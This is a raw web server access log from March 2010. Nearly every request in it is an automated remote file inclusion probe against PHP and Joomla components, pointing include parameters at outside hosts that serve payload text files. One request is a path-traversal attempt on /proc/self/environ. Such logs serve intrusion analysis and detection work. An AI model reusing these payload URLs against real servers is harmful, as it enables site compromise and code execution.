213.175.197.86 - - [12/Mar/2010:09:44:12 -0800] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.145.116.22 - - [12/Mar/2010:09:44:26 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
63.145.116.22 - - [12/Mar/2010:09:44:30 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 200 15030 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:44:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:44:41 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:44:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:44:48 -0800] "GET /logs/access_100126.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:44:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:44:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:09:45:02 -0800] "GET /logs/access_090908.log%20%20/myevent.php?myevent_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.221 - - [12/Mar/2010:09:45:03 -0800] "GET /logs/access_080205.log HTTP/1.0" 200 1188761 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:45:03 -0800] "GET /logs/access_090608.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:45:06 -0800] "GET /logs/access_100206.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:09:45:32 -0800] "GET /logs/access_090523.log%20%20/myevent.php?myevent_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:45:54 -0800] "GET /delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:45:54 -0800] "GET /logs//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:45:54 -0800] "GET /logs/access_090715.log%20%20//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:45:59 -0800] "GET /logs/access_090608.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:46:02 -0800] "GET /logs/access_100206.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:09:46:04 -0800] "GET /logs/access_080320.log/modules/My_eGallery/index.php?basepath=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:09:46:04 -0800] "GET /modules/My_eGallery/index.php?basepath=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:09:46:05 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:46:07 -0800] "GET /logs/access_071228.log%20%20//skin/zero_vote/error.php?dir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:46:07 -0800] "GET /logs/access_090925.log%20%20//skin/zero_vote/error.php?dir=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.157.211.204 - - [12/Mar/2010:09:46:10 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.157.211.204 - - [12/Mar/2010:09:46:10 -0800] "GET /logs/access_090409.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.157.211.204 - - [12/Mar/2010:09:46:10 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:09:46:12 -0800] "GET /modules/My_eGallery/index.php?basepath=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:09:46:12 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:09:46:12 -0800] "GET /logs/access_080320.log/modules/My_eGallery/index.php?basepath=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
88.131.106.11 - - [12/Mar/2010:09:46:12 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.dmulk.com"
88.131.106.11 - - [12/Mar/2010:09:46:13 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:46:18 -0800] "GET /logs/access_090519.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:46:22 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:46:22 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:46:27 -0800] "GET /logs/access_100206.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:09:46:31 -0800] "GET /logs/access_100112.log//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.48.245 - - [12/Mar/2010:09:46:31 -0800] "GET /logs/access_080422.log//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:46:38 -0800] "GET /logs/access_090605.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.180.124.146 - - [12/Mar/2010:09:46:42 -0800] "GET /logs/access_100216.log/////////?_SERVER%5BDOCUMENT_ROOT%5D=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.180.124.146 - - [12/Mar/2010:09:46:43 -0800] "GET ////////?_SERVER%5BDOCUMENT_ROOT%5D=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 200 15132 "-" "Mozilla/5.0" "www.dmulk.com"
211.180.124.146 - - [12/Mar/2010:09:46:43 -0800] "GET /logs/////////?_SERVER%5BDOCUMENT_ROOT%5D=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 200 142825 "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:09:46:46 -0800] "GET /logs/access.log%20%20//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:46:50 -0800] "GET /logs/access_080706.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.180.124.146 - - [12/Mar/2010:09:46:54 -0800] "GET /logs/access_100216.log/////////?_SERVER%5BDOCUMENT_ROOT%5D=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.180.124.146 - - [12/Mar/2010:09:46:54 -0800] "GET /logs/////////?_SERVER%5BDOCUMENT_ROOT%5D=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 200 142825 "-" "Mozilla/5.0" "www.dmulk.com"
211.180.124.146 - - [12/Mar/2010:09:46:54 -0800] "GET ////////?_SERVER%5BDOCUMENT_ROOT%5D=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 200 15132 "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:47:24 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:47:24 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:47:24 -0800] "GET /logs/access_090617.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:47:25 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:47:25 -0800] "GET /logs/access_090826.log//components/com_moofaq/includes/file_includer.php?gzip=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:47:25 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.111.95.42 - - [12/Mar/2010:09:47:34 -0800] "GET /logs/access_080727.log//helpwiki/datumscalc.php?kal_class_path=http://www.etegro.com/kz//includes/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.111.95.42 - - [12/Mar/2010:09:47:34 -0800] "GET /helpwiki/datumscalc.php?kal_class_path=http://www.etegro.com/kz//includes/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.111.95.42 - - [12/Mar/2010:09:47:34 -0800] "GET /logs//helpwiki/datumscalc.php?kal_class_path=http://www.etegro.com/kz//includes/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:48:02 -0800] "GET /logs/access_091129.log//components/com_moofaq/includes/file_includer.php?gzip=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:48:10 -0800] "GET /logs/access_090223.log/index2.php?mosConfig_absolute_path=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:48:11 -0800] "GET /index2.php?mosConfig_absolute_path=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:48:11 -0800] "GET /logs/index2.php?mosConfig_absolute_path=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
216.119.103.12 - - [12/Mar/2010:09:48:28 -0800] "GET /logs/access_090908.log/myevent.php?myevent_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [12/Mar/2010:09:48:28 -0800] "GET /logs/myevent.php?myevent_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [12/Mar/2010:09:48:28 -0800] "GET /myevent.php?myevent_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:48:36 -0800] "GET /logs/access_100206.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.36.25 - - [12/Mar/2010:09:48:36 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.36.25 - - [12/Mar/2010:09:48:36 -0800] "GET /logs/access_090117.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.36.25 - - [12/Mar/2010:09:48:37 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:48:37 -0800] "GET /logs/access_080925.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.111.95.42 - - [12/Mar/2010:09:48:38 -0800] "GET /logs/access_081009.log//helpwiki/datumscalc.php?kal_class_path=http://www.etegro.com/kz//includes/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:09:48:43 -0800] "GET /logs/access_100217.log%20%20//bbs//write_comment_update.php?board_skin_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:09:48:43 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:48:56 -0800] "GET /logs/access_081001.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:48:56 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:49:06 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:09:49:15 -0800] "GET /logs/access_100217.log%20%20//bbs//write_comment_update.php?board_skin_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:09:49:15 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:09:49:15 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:09:49:28 -0800] "GET /logs/access_100217.log%20%20//bbs//write_comment_update.php?board_skin_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:09:49:28 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:09:49:28 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
194.109.22.115 - - [12/Mar/2010:09:49:34 -0800] "GET /logs/access_090617.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
194.109.22.115 - - [12/Mar/2010:09:49:35 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
194.109.22.115 - - [12/Mar/2010:09:49:35 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.203.215.83 - - [12/Mar/2010:09:50:01 -0800] "GET /logs/access_090610.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:50:03 -0800] "GET /logs/access_100131.log//delete_all.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.78.109.87 - - [12/Mar/2010:09:50:33 -0800] "GET /logs/access_090617.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.78.109.87 - - [12/Mar/2010:09:50:33 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.78.109.87 - - [12/Mar/2010:09:50:33 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sumanenter.com/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:50:45 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
194.109.22.115 - - [12/Mar/2010:09:50:45 -0800] "GET /logs/access_080914.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:50:50 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:50:50 -0800] "GET /logs/access_100122.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:09:51:02 -0800] "GET /index2.php?lang=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:09:51:10 -0800] "GET /logs/access_090523.log/myevent.php?myevent_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.78.109.87 - - [12/Mar/2010:09:51:43 -0800] "GET /logs/index.php?body=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.78.109.87 - - [12/Mar/2010:09:51:43 -0800] "GET /logs/access_090516.log/index.php?body=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.78.109.87 - - [12/Mar/2010:09:51:48 -0800] "GET /index.php?body=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 14990 "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:51:55 -0800] "GET /logs/access_100122.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:09:51:57 -0800] "GET /logs/access_090426.log%20%20//////webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:09:51:57 -0800] "GET /logs//////webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:09:51:59 -0800] "GET /logs/access_080103.log%20%20//////webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:09:52:00 -0800] "GET /////webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:52:08 -0800] "GET /logs/access_090802.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.158.145.27 - - [12/Mar/2010:09:52:20 -0800] "GET /logs/access_081029.log HTTP/1.1" 200 131072 "-" "Yandex/1.01.001 (compatible; Win16; I)" "dmulk.com"
213.175.197.86 - - [12/Mar/2010:09:52:30 -0800] "GET /logs/access_080706.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:52:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:52:43 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
165.132.30.11 - - [12/Mar/2010:09:52:43 -0800] "GET /logs/access_091205.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
